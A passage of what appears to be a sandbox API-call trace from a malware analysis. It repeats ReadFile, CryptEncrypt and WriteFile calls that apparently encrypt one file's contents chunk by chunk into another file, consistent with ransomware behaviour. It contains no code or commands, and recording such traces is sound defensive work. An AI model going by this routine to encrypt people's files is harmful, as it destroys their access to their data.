lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.267] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.267] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.268] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.268] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.268] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.268] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.268] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.268] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.268] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.268] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.268] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.268] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.268] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.269] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.269] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.269] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.269] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.269] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.270] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.270] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.270] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.270] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.270] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.270] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.270] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.270] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.270] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.271] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.271] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.271] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.271] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.271] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.272] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.272] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.272] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.272] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.272] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.272] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.272] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.272] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.272] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.272] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.272] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.272] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.272] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.273] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.273] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.274] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.274] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.274] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.274] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.274] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.274] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.274] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.274] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.274] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.274] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.274] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.274] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.275] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.275] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.275] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.275] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.275] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.275] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.275] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.275] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 